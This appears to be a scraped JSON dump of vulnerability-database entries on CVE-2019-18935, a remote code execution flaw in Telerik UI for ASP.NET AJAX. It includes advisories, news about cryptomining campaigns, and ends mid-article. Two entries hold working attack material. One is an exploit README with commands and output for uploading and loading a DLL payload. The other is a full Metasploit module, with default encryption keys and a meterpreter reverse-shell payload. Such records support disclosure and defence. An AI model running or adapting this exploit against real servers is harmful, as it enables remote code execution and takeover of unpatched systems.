[LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-21T09:38:14", "description": "This Metasploit module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 2020.3.915).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "zdt", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-21T00:00:00", "id": "1337DAY-ID-35085", "href": "https://0day.today/exploit/description/35085", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll'\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if [email\u00a0protected]? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://0day.today/exploit/35085", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Progess Telerik UI for ASP.NET AJAX contains a deserialization of untrusted data vulnerability through RadAsyncUpload which leads to code execution on the server in the context of the w3wp.exe process.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-18935", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T11:49:24", "description": "telerik is vulnerable to remote code execution. A .NET JavaScriptSerializer Deserialization vulnerability through `RadAsyncUpload` allows an attacker to execute malicious code on the server in the context of the `w3wp.exe` process.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T09:22:09", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2023-03-15T20:46:59", "id": "VERACODE:25767", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25767/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:44", "description": "\nTelerik UI - Remote Code Execution via Insecure Deserialization", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "exploitpack", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "href": "", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\n\nInstall\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\npython3 -m venv env\nsource env/bin/activate\npip3 install -r requirements.txt\n\nRequirements\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\n\nUsage\nCompile mixed mode assembly DLL payload\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\n\nbuild_dll.bat sleep.c\nUpload and load payload into application via insecure deserialization\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\n\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\n[*] Local payload name: sleep_2019121205271355_x86.dll\n[*] Destination folder: C:\\Windows\\Temp\n[*] Remote payload name: 1576142987.918625.dll\n\n{'fileInfo': {'ContentLength': 75264,\n 'ContentType': 'application/octet-stream',\n 'DateJson': '1970-01-01T00:00:00.000Z',\n 'FileName': '1576142987.918625.dll',\n 'Index': 0},\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\n 'Telerik.Web.UI, Version=<VERSION>, '\n 'Culture=neutral, '\n 'PublicKeyToken=<TOKEN>',\n 'TempFileName': '1576142987.918625.dll'}}\n\n[*] Triggering deserialization...\n\n<title>Runtime Error</title>\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\n<h2> <i>Runtime Error</i> </h2></span>\n...omitted for brevity...\n\n[*] Response time: 13.01 seconds\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\n\nThanks\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-05-07T21:56:19", "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infVirtual Studio Technology (VST)ected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. \u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM \u2013 more specifically, it\u2019s a Tiny Core Linux 9.0 image configured to run XMRig. The victim\u2019s machine is added to a mining pool that the Linux image uses for CPU power.\n\nMalik noted that that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "cvss3": {}, "published": "2019-06-20T19:53:23", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:29", "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. 